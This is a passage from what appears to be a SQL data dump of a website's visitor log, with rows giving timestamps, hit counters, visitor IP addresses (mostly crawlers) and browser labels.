.59.7','other'),(271817,1531346563,1,1,0,0,'54.36.148.83','other'),(271818,1531346820,1,1,0,0,'54.36.148.137','other'),(271819,1531347386,1,1,0,0,'54.36.148.189','other'),(271820,1531347452,1,1,0,0,'136.243.74.73','other'),(271821,1531347454,1,1,0,0,'54.36.148.52','other'),(271822,1531347534,1,1,0,0,'54.36.148.29','other'),(271823,1531347538,1,1,0,0,'54.36.148.190','other'),(271824,1531347619,1,1,0,0,'54.36.149.84','other'),(271825,1531347770,1,1,0,0,'54.36.148.176','other'),(271826,1531347948,1,1,0,0,'54.36.149.103','other'),(271827,1531347958,1,1,0,0,'54.165.59.7','other'),(271828,1531348035,1,1,0,0,'8.29.198.27','other'),(271829,1531348705,1,1,0,0,'54.36.149.77','other'),(271830,1531348818,2,2,0,0,'91.196.178.176','chrome'),(271831,1531348867,1,1,0,0,'54.36.148.46','other'),(271832,1531349189,1,1,0,0,'54.36.149.6','other'),(271833,1531349302,1,1,0,0,'180.76.15.140','other'),(271834,1531349327,1,1,0,0,'54.36.148.141','other'),(271835,1531349512,1,1,0,0,'54.36.148.143','other'),(271836,1531349556,1,1,0,0,'54.36.149.51','other'),(271837,1531349583,1,1,0,0,'54.36.148.182','other'),(271838,1531350327,1,1,0,0,'54.36.148.245','other'),(271839,1531350565,1,1,0,0,'54.36.148.134','other'),(271840,1531350597,1,1,0,0,'54.36.148.69','other'),(271841,1531350709,1,0,1,0,'66.249.75.155',''),(271842,1531350988,1,1,0,0,'54.36.148.67','other'),(271843,1531351179,1,1,0,0,'54.36.148.40','other'),(271844,1531351321,1,1,0,0,'54.36.148.153','other'),(271845,1531351366,1,1,0,0,'54.36.149.24','other'),(271846,1531352324,1,1,0,0,'173.249.24.45','chrome'),(271847,1531352688,1,1,0,0,'54.36.148.177','other'),(271848,1531352841,1,1,0,0,'54.36.149.84','other'),(271849,1531352993,1,1,0,0,'54.36.148.133','other'),(271850,1531353311,1,1,0,0,'54.36.149.46','other'),(271851,1531353422,1,1,0,0,'54.36.148.125','other'),(271852,1531353518,1,1,0,0,'54.36.148.22','other'),(271853,1531353520,1,1,0,0,'54.36.148.238','other'),(271854,1531353541,1,1,0,0,'178.154.171.88','other'),(271855,1531353791,1,1,0,0,'23.20.25.122','other'),(271856,1531353841,1,1,0,0,'54.36.149.104','other'),(271857,1531353939,1,1,0,0,'54.36.148.110','other'),(271858,1531354021,1,1,0,0,'54.36.148.69','other'),(271859,1531354062,1,1,0,0,'54.36.149.87','other'),(271860,1531354147,1,1,0,0,'54.36.148.36','other'),(271861,1531354577,1,1,0,0,'54.36.148.11','other'),(271862,1531354661,1,1,0,0,'54.36.148.92','other'),(271863,1531354959,1,1,0,0,'54.36.149.93','other'),(271864,1531354999,1,1,0,0,'8.29.198.26','other'),(271865,1531355044,2,2,0,0,'216.244.66.241','other'),(271866,1531356552,1,1,0,0,'54.36.149.7','other'),(271867,1531356602,1,1,0,0,'54.36.148.176','other'),(271868,1531356819,1,1,0,0,'54.36.148.99','other'),(271869,1531356908,1,1,0,0,'54.36.148.154','other'),(271870,1531357110,1,1,0,0,'138.201.61.158','other'),(271871,1531357575,1,1,0,0,'216.244.66.241','other'),(271872,1531357671,1,1,0,0,'54.36.148.143','other'),(271873,1531357685,1,1,0,0,'180.76.15.150','other'),(271874,1531357801,1,1,0,0,'54.36.149.71','other'),(271875,1531357812,1,1,0,0,'54.36.149.34','other'),(271876,1531357826,1,1,0,0,'54.36.148.92','other'),(271877,1531358009,1,1,0,0,'87.250.224.96','other'),(271878,1531358138,1,1,0,0,'54.36.149.20','other'),(271879,1531358384,1,1,0,0,'54.36.148.57','other'),(271880,1531358393,1,1,0,0,'54.36.148.194','other'),(271881,1531358500,1,1,0,0,'54.36.148.252','other'),(271882,1531358867,1,1,0,0,'8.29.198.26','other'),(271883,1531359058,1,1,0,0,'54.36.148.98','other'),(271884,1531359235,1,1,0,0,'37.9.113.82','other'),(271885,1531359260,1,1,0,0,'178.154.171.55','other'),(271886,1531359262,1,1,0,0,'54.36.148.141','other'),(271887,1531359751,1,1,0,0,'54.36.149.14','other'),(271888,1531359934,1,1,0,0,'54.36.148.89','other'),(271889,1531360665,1,1,0,0,'54.36.148.229','other'),(271890,1531360916,1,1,0,0,'54.36.148.244','other'),(271891,1531361080,2,2,0,0,'216.244.66.241','other'),(271892,1531361354,1,1,0,0,'54.36.149.27','other'),(271893,1531361809,1,1,0,0,'54.36.148.21','other'),(271894,1531362083,1,1,0,0,'54.36.148.100','other'),(271895,1531362141,1,1,0,0,'54.36.148.73','other'),(271896,1531362182,1,1,0,0,'54.165.59.7','other'),(271897,1531362214,1,0,1,0,'66.249.69.185',''),(271898,1531362887,1,1,0,0,'54.36.148.56','other'),(271899,1531363001,1,1,0,0,'141.8.142.74','other'),(271900,1531363194,1,0,1,0,'66.249.69.185',''),(271901,1531363986,1,1,0,0,'54.36.148.29','other'),(271902,1531364155,2,2,0,0,'54.36.148.216','other'),(271903,1531364754,1,1,0,0,'54.36.148.123','other'),(271904,1531365514,1,1,0,0,'54.36.149.36','other'),(271905,1531365552,1,1,0,0,'54.36.149.79','other'),(271906,1531365559,1,1,0,0,'54.36.148.154','other'),(271907,1531365591,1,1,0,0,'54.36.148.58','other'),(271908,1531365604,1,1,0,0,'54.36.148.76','other'),(271909,1531365672,1,1,0,0,'54.36.149.81','other'),(271910,1531365676,15,15,0,0,'204.12.197.234','other'),(271911,1531365799,1,1,0,0,'54.36.149.27','other'),(271912,1531365864,1,1,0,0,'8.29.198.27','other'),(271913,1531365952,1,1,0,0,'54.36.148.191','other'),(271914,1531366165,1,1,0,0,'54.36.148.49','other'),(271915,1531366678,1,1,0,0,'54.36.149.7','other'),(271916,1531366713,1,1,0,0,'54.36.148.137','other'),(271917,1531366819,1,1,0,0,'54.36.149.97','other'),(271918,1531368279,2,2,0,0,'216.244.66.241','other'),(271919,1531368342,1,1,0,0,'54.36.148.159','other'),(271920,1531368373,1,1,0,0,'54.36.149.106','other'),(271921,1531368410,1,1,0,0,'157.55.39.237','other'),(271922,1531368906,1,1,0,0,'54.36.148.52','other'),(271923,1531368944,1,1,0,0,'54.36.148.214','other'),(271924,1531369195,1,1,0,0,'54.36.149.55','other'),(271925,1531369209,1,1,0,0,'54.36.148.234','other'),(271926,1531369369,1,1,0,0,'54.36.149.61','other'),(271927,1531369427,1,1,0,0,'54.36.148.32','other'),(271928,1531369636,1,1,0,0,'54.36.149.39','other'),(271929,1531369707,1,1,0,0,'8.29.198.27','other'),(271930,1531369863,1,1,0,0,'54.36.148.103','other'),(271931,1531369955,1,1,0,0,'54.36.148.224','other'),(271932,1531370154,1,1,0,0,'54.36.149.87','other'),(271933,1531370224,1,1,0,0,'54.36.148.150','other'),(271934,1531370244,1,1,0,0,'54.36.148.99','other'),(271935,1531370482,1,1,0,0,'54.36.148.220','other'),(271936,1531371228,1,1,0,0,'54.36.149.62','other'),(271937,1531371286,1,1,0,0,'54.36.148.136','other'),(271938,1531371376,1,1,0,0,'54.36.148.208','other'),(271939,1531371457,1,1,0,0,'141.8.142.74','other'),(271940,1531371461,1,1,0,0,'54.36.148.202','other'),(271941,1531371566,1,1,0,0,'54.36.149.97','other'),(271942,1531371687,1,1,0,0,'54.36.148.100','other'),(271943,1531371716,1,1,0,0,'54.36.149.63','other'),(271944,1531371807,1,1,0,0,'54.36.149.29','other'),(271945,1531372261,1,1,0,0,'54.36.148.119','other'),(271946,1531372314,1,1,0,0,'54.36.148.254','other'),(271947,1531372517,1,1,0,0,'54.36.148.30','other'),(271948,1531372698,2,2,0,0,'91.196.178.169','chrome'),(271949,1531372722,1,1,0,0,'37.9.113.182','other'),(271950,1531372750,1,1,0,0,'54.36.149.71','other'),(271951,1531372788,1,1,0,0,'54.36.148.23','other'),(271952,1531372831,1,1,0,0,'54.36.148.99','other'),(271953,1531372892,1,1,0,0,'54.36.148.17','other'),(271954,1531373019,1,1,0,0,'37.52.151.120','chrome'),(271955,1531373251,1,1,0,0,'54.36.148.63','other'),(271956,1531373513,2,2,0,0,'91.196.179.134','chrome'),(271957,1531373516,1,1,0,0,'54.36.148.115','other'),(271958,1531374022,1,1,0,0,'216.244.66.241','other'),(271959,1531374423,1,0,1,0,'66.249.69.189',''),(271960,1531374721,1,1,0,0,'54.36.148.51','other'),(271961,1531374824,1,1,0,0,'54.36.149.81','other'),(271962,1531374826,1,1,0,0,'54.36.148.123','other'),(271963,1531375210,1,1,0,0,'54.36.148.137','other'),(271964,1531375260,1,1,0,0,'91.196.178.84','firefox'),(271965,1531375373,1,1,0,0,'95.135.1.241','chrome'),(271966,1531375727,1,1,0,0,'54.36.148.23','other'),(271967,1531375775,1,1,0,0,'162.210.196.129','other'),(271968,1531375889,1,1,0,0,'178.154.171.88','other'),(271969,1531376087,1,1,0,0,'54.36.149.91','other'),(271970,1531376495,1,1,0,0,'54.36.148.150','other'),(271971,1531376711,1,1,0,0,'8.29.198.25','other'),(271972,1531376753,1,1,0,0,'54.36.148.184','other'),(271973,1531376904,1,1,0,0,'54.36.149.67','other'),(271974,1531377199,1,1,0,0,'54.36.149.44','other'),(271975,1531377272,1,1,0,0,'54.36.148.170','other'),(271976,1531377349,1,1,0,0,'54.36.148.144','other'),(271977,1531377587,1,1,0,0,'91.124.182.170','firefox'),(271978,1531378088,1,0,1,0,'66.249.69.230',''),(271979,1531378471,1,1,0,0,'95.163.255.116','other'),(271980,1531378483,1,1,0,0,'54.36.148.161','other'),(271981,1531378490,1,1,0,0,'54.36.149.83','other'),(271982,1531378574,2,2,0,0,'216.244.66.241','other'),(271983,1531378850,1,1,0,0,'141.8.142.74','other'),(271984,1531378886,1,1,0,0,'54.36.148.194','other'),(271985,1531378899,1,1,0,0,'54.36.148.63','other'),(271986,1531379071,1,1,0,0,'54.36.149.4','other'),(271987,1531379094,1,1,0,0,'54.36.148.74','other'),(271988,1531379102,1,1,0,0,'54.36.148.66','other'),(271989,1531379218,1,1,0,0,'54.36.148.17','other'),(271990,1531379700,2,2,0,0,'37.55.56.198','chrome'),(271991,1531379902,1,1,0,0,'54.36.148.239','other'),(271992,1531380023,1,1,0,0,'91.196.178.175','chrome'),(271993,1531380403,1,1,0,0,'54.36.148.51','other'),(271994,1531380540,1,1,0,0,'8.29.198.26','other'),(271995,1531380581,1,1,0,0,'54.36.149.76','other'),(271996,1531380757,1,1,0,0,'54.36.148.190','other'),(271997,1531380897,2,2,0,0,'91.196.178.169','chrome'),(271998,1531380910,4,4,0,0,'91.196.178.78','chrome'),(271999,1531381107,1,1,0,0,'54.36.148.227','other'),(272000,1531381192,1,1,0,0,'54.36.149.61','other'),(272001,1531381287,1,1,0,0,'54.36.149.6','other'),(272002,1531381507,1,1,0,0,'216.244.66.241','other'),(272003,1531381644,2,2,0,0,'91.196.178.68','chrome'),(272004,1531381758,1,1,0,0,'54.36.148.168','other'),(272005,1531381863,1,1,0,0,'54.36.148.222','other'),(272006,1531381967,1,1,0,0,'54.36.149.35','other'),(272007,1531382405,1,1,0,0,'54.36.149.50','other'),(272008,1531382425,1,1,0,0,'54.36.148.255','other'),(272009,1531382478,1,1,0,0,'141.8.142.74','other'),(272010,1531382703,1,1,0,0,'54.36.148.214','other'),(272011,1531382888,1,1,0,0,'54.36.148.121','other'),(272012,1531382970,1,1,0,0,'54.36.148.19','other'),(272013,1531383100,1,1,0,0,'148.251.38.94','other'),(272014,1531383622,6,6,0,0,'216.244.66.241','other'),(272015,1531383654,1,1,0,0,'173.249.24.45','firefox'),(272016,1531383748,1,1,0,0,'193.28.200.2','firefox'),(272017,1531383947,1,1,0,0,'95.67.111.22','chrome'),(272018,1531383993,1,1,0,0,'54.36.149.69','other'),(272019,1531384208,1,1,0,0,'54.36.148.190','other'),(272020,1531384463,1,1,0,0,'54.36.148.148','other'),(272021,1531384467,1,1,0,0,'54.36.148.214','other'),(272022,1531384483,2,2,0,0,'130.180.220.50','chrome'),(272023,1531384551,1,1,0,0,'178.154.171.88','other'),(272024,1531384629,1,1,0,0,'54.36.149.100','other'),(272025,1531384654,1,1,0,0,'193.28.200.2','firefox'),(272026,1531384687,1,1,0,0,'54.36.149.47','other'),(272027,1531384692,2,2,0,0,'91.196.178.68','chrome'),(272028,1531384936,1,1,0,0,'54.36.149.94','other'),(272029,1531385149,1,1,0,0,'54.36.148.112','other'),(272030,1531385201,1,1,0,0,'91.196.178.87','firefox'),(272031,1531385233,1,1,0,0,'94.178.173.59','chrome'),(272032,1531385342,2,2,0,0,'46.174.163.134','chrome'),(272033,1531385382,1,1,0,0,'37.73.195.27','chrome'),(272034,1531385623,2,2,0,0,'91.196.178.78','chrome'),(272035,1531385724,1,1,0,0,'54.36.149.99','other'),(272036,1531385744,1,1,0,0,'91.196.178.135','firefox'),(272037,1531386242,3,3,0,0,'91.196.178.176','chrome'),(272038,1531386301,2,2,0,0,'91.196.178.187','chrome'),(272039,1531386308,1,1,0,0,'54.36.149.12','other'),(272040,1531386442,1,1,0,0,'54.36.148.27','other'),(272041,1531386479,5,5,0,0,'216.244.66.241','other'),(272042,1531386503,1,1,0,0,'54.36.148.90','other'),(272043,1531386538,1,1,0,0,'176.122.100.126','chrome'),(272044,1531386556,1,1,0,0,'46.174.163.134','chrome'),(272045,1531386836,1,1,0,0,'54.36.148.20','other'),(272046,1531386999,1,1,0,0,'54.36.149.56','other'),(272047,1531387159,1,0,1,0,'66.249.69.232',''),(272048,1531387298,1,1,0,0,'54.36.148.137','other'),(272049,1531387521,1,1,0,0,'54.36.149.105','other'),(272050,1531387566,1,1,0,0,'8.29.198.25','other'),(272051,1531387714,1,1,0,0,'54.36.148.78','other'),(272052,1531388097,1,1,0,0,'91.196.177.176','chrome'),(272053,1531388147,1,1,0,0,'54.36.149.82','other'),(272054,1531388160,1,1,0,0,'54.36.148.186','other'),(272055,1531388225,1,1,0,0,'54.36.148.113','other'),(272056,1531388254,1,1,0,0,'54.36.148.166','other'),(272057,1531388406,2,2,0,0,'91.196.178.169','chrome'),(272058,1531388607,1,1,0,0,'91.124.182.170','firefox'),(272059,1531388645,1,1,0,0,'176.122.100.126','chrome'),(272060,1531388672,3,3,0,0,'216.244.66.241','other'),(272061,1531388902,3,3,0,0,'5.9.77.102','other'),(272062,1531389067,1,1,0,0,'54.36.148.87','other'),(272063,1531389346,1,1,0,0,'54.36.148.215','other'),(272064,1531389762,1,1,0,0,'54.36.149.32','other'),(272065,1531389785,1,1,0,0,'54.36.149.97','other'),(272066,1531389817,1,1,0,0,'178.154.171.88','other'),(272067,1531389948,1,1,0,0,'54.36.148.114','other'),(272068,1531389950,1,1,0,0,'54.36.148.58','other'),(272069,1531390154,1,1,0,0,'54.36.149.86','other'),(272070,1531390397,1,1,0,0,'95.163.255.94','other'),(272071,1531390488,1,1,0,0,'54.36.148.154','other'),(272072,1531390716,1,1,0,0,'54.36.149.82','other'),(272073,1531390874,1,1,0,0,'54.36.148.61','other'),(272074,1531390892,1,1,0,0,'54.36.149.98','other'),(272075,1531391137,1,1,0,0,'54.36.148.43','other'),(272076,1531391288,1,1,0,0,'54.36.148.198','other'),(272077,1531391338,1,1,0,0,'54.36.148.81','other'),(272078,1531391374,1,1,0,0,'8.29.198.25','other'),(272079,1531391617,97,97,0,0,'95.216.41.162','other'),(272080,1531391686,1,0,1,0,'66.249.69.232',''),(272081,1531391713,1,1,0,0,'54.36.149.0','other'),(272082,1531391738,3,3,0,0,'216.244.66.241','other'),(272083,1531391817,1,1,0,0,'54.36.148.203','other'),(272084,1531391825,1,1,0,0,'54.36.149.40','other'),(272085,1531391917,1,1,0,0,'178.154.171.88','other'),(272086,1531391978,1,1,0,0,'54.36.148.58','other'),(272087,1531392037,1,0,1,0,'66.249.69.185',''),(272088,1531392362,1,1,0,0,'54.36.149.64','other'),(272089,1531392491,1,1,0,0,'54.36.148.142','other'),(272090,1531392671,1,1,0,0,'95.163.255.104','other'),(272091,1531392689,1,1,0,0,'95.163.255.113','other'),(272092,1531392696,1,1,0,0,'95.163.255.118','other'),(272093,1531392781,1,1,0,0,'176.101.223.203','chrome'),(272094,1531392839,1,1,0,0,'54.36.148.132','other'),(272095,1531393009,1,1,0,0,'54.36.149.69','other'),(272096,1531393081,2,2,0,0,'91.196.178.68','chrome'),(272097,1531393122,1,1,0,0,'54.36.148.153','other'),(272098,1531393186,1,1,0,0,'185.127.167.151','firefox'),(272099,1531393308,1,1,0,0,'54.36.148.88','other'),(272100,1531393385,1,1,0,0,'54.36.149.90','other'),(272101,1531393397,1,1,0,0,'54.36.148.200','other'),(272102,1531393498,1,1,0,0,'141.8.142.74','other'),(272103,1531393615,1,1,0,0,'54.36.148.123','other'),(272104,1531393635,1,1,0,0,'54.36.148.231','other'),(272105,1531393650,1,1,0,0,'216.244.66.241','other'),(272106,1531393751,1,1,0,0,'54.36.148.218','other'),(272107,1531393793,1,1,0,0,'54.36.149.45','other'),(272108,1531393929,1,1,0,0,'54.36.149.50','other'),(272109,1531394194,1,1,0,0,'54.36.148.187','other'),(272110,1531394493,1,1,0,0,'54.36.148.11','other'),(272111,1531394581,1,1,0,0,'216.244.66.241','other'),(272112,1531394591,1,1,0,0,'54.36.148.250','other'),(272113,1531394772,1,1,0,0,'54.36.148.231','other'),(272114,1531395022,1,1,0,0,'54.36.149.72','other'),(272115,1531395090,1,1,0,0,'54.36.148.36','other'),(272116,1531395105,1,1,0,0,'54.36.148.151','other'),(272117,1531395353,1,1,0,0,'91.196.178.68','chrome'),(272118,1531395712,1,1,0,0,'54.36.148.153','other'),(272119,1531395767,1,1,0,0,'216.244.66.241','other'),(272120,1531395870,2,0,2,0,'66.249.69.230',''),(272121,1531395873,1,1,0,0,'54.36.148.140','other'),(272122,1531396122,1,0,1,0,'66.249.69.228',''),(272123,1531396143,1,1,0,0,'54.36.149.48','other'),(272124,1531396194,1,1,0,0,'91.124.187.99','chrome'),(272125,1531396505,1,1,0,0,'54.36.148.221','other'),(272126,1531396582,1,1,0,0,'54.36.148.65','other'),(272127,1531396727,1,1,0,0,'216.244.66.241','other'),(272128,1531397496,1,1,0,0,'37.55.158.118','chrome'),(272129,1531397713,1,1,0,0,'54.36.149.71','other'),(272130,1531397789,1,1,0,0,'54.36.148.181','other'),(272131,1531398032,2,2,0,0,'91.196.178.68','chrome'),(272132,1531398128,1,1,0,0,'178.154.171.88','other'),(272133,1531398186,1,1,0,0,'54.36.148.117','other'),(272134,1531398413,1,1,0,0,'8.29.198.26','other'),(272135,1531398466,1,1,0,0,'91.211.12.130','chrome'),(272136,1531398640,1,1,0,0,'37.55.158.118','chrome'),(272137,1531398651,2,2,0,0,'91.196.178.169','chrome'),(272138,1531399030,1,1,0,0,'54.36.149.88','other'),(272139,1531399152,4,4,0,0,'216.244.66.241','other'),(272140,1531399611,1,1,0,0,'176.103.214.52','chrome'),(272141,1531399770,1,1,0,0,'54.36.148.59','other'),(272142,1531399875,1,1,0,0,'54.36.148.20','other'),(272143,1531399999,1,1,0,0,'54.36.149.52','other'),(272144,1531400010,1,1,0,0,'54.36.148.205','other'),(272145,1531400046,1,1,0,0,'141.8.142.74','other'),(272146,1531400142,1,1,0,0,'54.36.148.11','other'),(272147,1531400422,1,1,0,0,'54.36.148.175','other'),(272148,1531401303,1,1,0,0,'178.95.66.69','chrome'),(272149,1531401594,1,1,0,0,'54.36.148.125','other'),(272150,1531401679,1,1,0,0,'54.36.148.76','other'),(272151,1531401858,1,1,0,0,'91.196.178.70','firefox'),(272152,1531401897,1,1,0,0,'54.36.149.48','other'),(272153,1531401905,4,4,0,0,'216.244.66.241','other'),(272154,1531402218,1,1,0,0,'144.76.166.14','other'),(272155,1531402230,1,1,0,0,'8.29.198.25','other'),(272156,1531402369,1,1,0,0,'91.124.182.170','firefox'),(272157,1531402499,2,2,0,0,'37.53.253.230','chrome'),(272158,1531402577,1,1,0,0,'54.36.148.177','other'),(272159,1531403034,1,1,0,0,'54.36.149.17','other'),(272160,1531403059,1,1,0,0,'54.224.60.122','other'),(272161,1531403152,2,2,0,0,'91.196.178.84','chrome'),(272162,1531403155,1,1,0,0,'54.36.148.142','other'),(272163,1531403168,1,1,0,0,'141.8.142.74','other'),(272164,1531403169,1,1,0,0,'54.36.148.73','other'),(272165,1531403231,1,1,0,0,'54.36.148.16','other'),(272166,1531403552,1,1,0,0,'91.196.178.188','chrome'),(272167,1531403883,1,1,0,0,'54.36.149.50','other'),(272168,1531403937,1,1,0,0,'54.36.148.136','other'),(272169,1531403973,1,1,0,0,'54.36.149.41','other'),(272170,1531403988,2,2,0,0,'91.196.178.84','firefox'),(272171,1531404003,5,5,0,0,'216.244.66.241','other'),(272172,1531404188,1,1,0,0,'54.224.60.122','other'),(272173,1531404353,1,1,0,0,'54.36.148.15','other'),(272174,1531404405,1,1,0,0,'54.36.148.246','other'),(272175,1531404690,1,1,0,0,'54.36.149.68','other'),(272176,1531404888,1,1,0,0,'54.36.149.105','other'),(272177,1531404906,1,1,0,0,'91.196.178.84','firefox'),(272178,1531404995,2,2,0,0,'91.196.178.178','chrome'),(272179,1531405011,1,1,0,0,'91.196.177.35','chrome'),(272180,1531405487,1,1,0,0,'54.36.148.118','other'),(272181,1531405496,1,1,0,0,'54.36.148.225','other'),(272182,1531405711,1,1,0,0,'54.36.148.129','other'),(272183,1531406101,2,2,0,0,'178.154.171.88','other'),(272184,1531406108,1,1,0,0,'141.8.142.74','other'),(272185,1531406422,1,1,0,0,'54.224.60.122','other'),(272186,1531406474,1,1,0,0,'54.36.149.56','other'),(272187,1531406923,1,1,0,0,'54.36.148.204','other'),(272188,1531407040,5,5,0,0,'216.244.66.241','other'),(272189,1531407068,1,1,0,0,'66.249.69.232','chrome'),(272190,1531407369,1,1,0,0,'54.224.60.122','other'),(272191,1531408029,1,1,0,0,'54.36.148.215','other'),(272192,1531408413,1,1,0,0,'54.36.148.104','other'),(272193,1531408470,1,1,0,0,'54.36.149.16','other'),(272194,1531408475,1,1,0,0,'54.36.149.66','other'),(272195,1531408495,1,1,0,0,'54.36.149.78','other'),(272196,1531408842,1,1,0,0,'46.242.55.200','msie'),(272197,1531408903,1,1,0,0,'54.36.148.109','other'),(272198,1531409132,1,1,0,0,'54.36.148.98','other'),(272199,1531409283,1,1,0,0,'8.29.198.27','other'),(272200,1531409632,1,1,0,0,'178.154.171.88','other'),(272201,1531409655,3,3,0,0,'216.244.66.241','other'),(272202,1531409763,1,1,0,0,'85.238.103.44','chrome'),(272203,1531409900,1,1,0,0,'54.36.149.73','other'),(272204,1531410092,1,1,0,0,'141.8.142.74','other'),(272205,1531410129,1,1,0,0,'54.36.148.207','other'),(272206,1531410178,1,1,0,0,'54.36.149.81','other'),(272207,1531410476,1,1,0,0,'54.36.148.33','other'),(272208,1531410633,1,1,0,0,'54.36.149.53','other'),(272209,1531410647,1,1,0,0,'54.36.148.55','other'),(272210,1531410659,1,1,0,0,'54.36.148.94','other'),(272211,1531410823,1,1,0,0,'54.36.148.98','other'),(272212,1531410876,1,1,0,0,'54.36.148.203','other'),(272213,1531411577,1,1,0,0,'54.36.148.243','other'),(272214,1531411612,1,1,0,0,'54.36.148.101','other'),(272215,1531411686,1,1,0,0,'54.36.148.238','other'),(272216,1531411695,1,1,0,0,'54.36.148.111','other'),(272217,1531411778,6,6,0,0,'62.210.157.95','other'),(272218,1531411823,1,1,0,0,'188.230.43.254','other'),(272219,1531411930,1,1,0,0,'54.36.148.198','other'),(272220,1531411951,1,1,0,0,'54.36.148.63','other'),(272221,1531412170,1,1,0,0,'54.36.149.19','other'),(272222,1531412316,5,5,0,0,'216.244.66.241','other'),(272223,1531412341,1,1,0,0,'54.36.148.159','other'),(272224,1531412412,1,1,0,0,'54.36.148.141','other'),(272225,1531413051,1,1,0,0,'54.36.149.36','other'),(272226,1531413067,1,1,0,0,'8.29.198.27','other'),(272227,1531413240,1,1,0,0,'54.36.148.16','other'),(272228,1531413248,1,1,0,0,'54.36.148.235','other'),(272229,1531413698,1,1,0,0,'54.36.148.223','other'),(272230,1531413821,1,1,0,0,'54.36.148.145','other'),(272231,1531413925,1,1,0,0,'54.36.148.185','other'),(272232,1531414090,1,1,0,0,'95.163.255.150','other'),(272233,1531414187,1,1,0,0,'54.36.148.199','other'),(272234,1531414236,1,1,0,0,'188.230.43.254','other'),(272235,1531414422,1,1,0,0,'54.36.148.139','other'),(272236,1531414473,1,1,0,0,'54.36.148.178','other'),(272237,1531414479,4,4,0,0,'216.244.66.241','other'),(272238,1531414706,1,1,0,0,'54.36.148.61','other'),(272239,1531414847,2,2,0,0,'37.9.113.101','other'),(272240,1531414848,1,1,0,0,'5.45.207.82','other'),(272241,1531415066,1,1,0,0,'54.36.149.54','other'),(272242,1531415222,1,1,0,0,'54.36.148.140','other'),(272243,1531415260,1,1,0,0,'54.36.148.53','other'),(272244,1531415388,1,1,0,0,'54.225.32.164','other'),(272245,1531415411,1,1,0,0,'54.36.148.96','other'),(272246,1531415708,1,1,0,0,'54.36.149.17','other'),(272247,1531415835,1,1,0,0,'54.36.148.211','other'),(272248,1531415924,1,1,0,0,'95.163.255.95','other'),(272249,1531415929,1,1,0,0,'54.36.148.222','other'),(272250,1531415973,1,1,0,0,'54.36.148.105','other'),(272251,1531416298,1,1,0,0,'54.225.32.164','other'),(272252,1531416519,1,1,0,0,'54.36.148.58','other'),(272253,1531416731,1,1,0,0,'54.36.148.166','other'),(272254,1531416825,1,1,0,0,'54.36.148.104','other'),(272255,1531416895,1,1,0,0,'54.36.148.84','other'),(272256,1531417262,2,2,0,0,'66.249.69.232','chrome'),(272257,1531417269,7,7,0,0,'216.244.66.241','other'),(272258,1531417298,1,1,0,0,'107.21.1.8','other'),(272259,1531417300,1,1,0,0,'54.208.102.37','other'),(272260,1531417335,1,1,0,0,'188.230.43.254','other'),(272261,1531417353,1,1,0,0,'87.250.224.46','other'),(272262,1531417496,1,1,0,0,'54.36.149.16','other'),(272263,1531417630,1,1,0,0,'54.36.148.233','other'),(272264,1531417712,1,1,0,0,'91.196.178.132','firefox'),(272265,1531417861,4,4,0,0,'54.225.32.164','other'),(272266,1531418084,1,1,0,0,'54.36.148.73','other'),(272267,1531418119,1,1,0,0,'54.36.148.165','other'),(272268,1531418163,1,1,0,0,'52.90.243.13','other'),(272269,1531418177,1,1,0,0,'54.36.149.82','other'),(272270,1531418882,2,2,0,0,'54.225.32.164','other'),(272271,1531418968,1,1,0,0,'148.251.120.201','other'),(272272,1531418979,1,1,0,0,'54.36.148.36','other'),(272273,1531419190,1,1,0,0,'54.36.148.142','other'),(272274,1531419575,1,1,0,0,'141.8.142.74','other'),(272275,1531419646,1,1,0,0,'188.230.43.254','other'),(272276,1531419713,1,1,0,0,'95.163.255.158','other'),(272277,1531419846,2,2,0,0,'216.244.66.241','other'),(272278,1531420124,1,1,0,0,'8.29.198.27','other'),(272279,1531420277,1,1,0,0,'54.36.148.249','other'),(272280,1531420486,1,1,0,0,'91.196.178.131','chrome'),(272281,1531420969,1,1,0,0,'54.36.149.63','other'),(272282,1531421044,4,4,0,0,'54.225.32.164','other'),(272283,1531421114,1,1,0,0,'54.36.149.42','other'),(272284,1531421265,1,1,0,0,'62.210.101.96','other'),(272285,1531421272,1,1,0,0,'54.36.148.220','other'),(272286,1531421597,1,1,0,0,'66.249.69.185','chrome'),(272287,1531421680,1,1,0,0,'54.36.148.148','other'),(272288,1531421742,1,1,0,0,'54.209.15.199','other'),(272289,1531421745,1,1,0,0,'54.36.149.3','other'),(272290,1531421877,1,1,0,0,'54.36.148.127','other'),(272291,1531421927,5,5,0,0,'216.244.66.241','other'),(272292,1531422145,1,1,0,0,'54.36.148.123','other'),(272293,1531422166,1,1,0,0,'188.230.43.254','other'),(272294,1531422212,1,1,0,0,'95.163.255.97','other'),(272295,1531422249,4,4,0,0,'54.225.32.164','other'),(272296,1531422347,1,1,0,0,'54.36.148.104','other'),(272297,1531422369,1,1,0,0,'54.36.148.24','other'),(272298,1531422384,1,1,0,0,'54.36.148.252','other'),(272299,1531422698,1,1,0,0,'54.36.149.35','other'),(272300,1531422734,1,1,0,0,'54.36.148.82','other'),(272301,1531422916,1,1,0,0,'216.244.66.241','other'),(272302,1531423027,1,1,0,0,'157.55.39.233','other'),(272303,1531423028,1,1,0,0,'54.36.149.21','other'),(272304,1531423266,1,1,0,0,'54.36.149.97','other'),(272305,1531423362,1,1,0,0,'54.36.148.214','other'),(272306,1531423402,1,1,0,0,'52.53.201.78','chrome'),(272307,1531423406,1,1,0,0,'54.36.148.19','other'),(272308,1531423715,1,1,0,0,'54.36.148.31','other'),(272309,1531423785,1,1,0,0,'54.36.148.153','other'),(272310,1531423907,1,1,0,0,'8.29.198.27','other'),(272311,1531423936,1,0,1,0,'66.249.69.230',''),(272312,1531423943,1,0,1,0,'66.249.69.185',''),(272313,1531423973,2,2,0,0,'54.225.32.164','other'),(272314,1531423998,1,1,0,0,'54.36.148.194','other'),(272315,1531424079,1,1,0,0,'54.36.148.50','other'),(272316,1531424124,1,1,0,0,'54.36.148.46','other'),(272317,1531424671,1,1,0,0,'54.36.148.233','other'),(272318,1531424856,1,1,0,0,'54.36.149.25','other'),(272319,1531425188,1,0,1,0,'66.249.69.187',''),(272320,1531425314,1,1,0,0,'157.55.39.233','other'),(272321,1531425394,1,1,0,0,'54.36.149.10','other'),(272322,1531425441,1,1,0,0,'54.36.148.140','other'),(272323,1531425581,1,1,0,0,'54.36.149.104','other'),(272324,1531425603,2,2,0,0,'54.225.32.164','other'),(272325,1531425655,1,1,0,0,'216.244.66.241','other'),(272326,1531425680,1,1,0,0,'54.36.149.71','other'),(272327,1531425857,1,1,0,0,'54.36.148.177','other'),(272328,1531426624,1,1,0,0,'54.36.148.122','other'),(272329,1531426752,1,1,0,0,'54.36.148.47','other'),(272330,1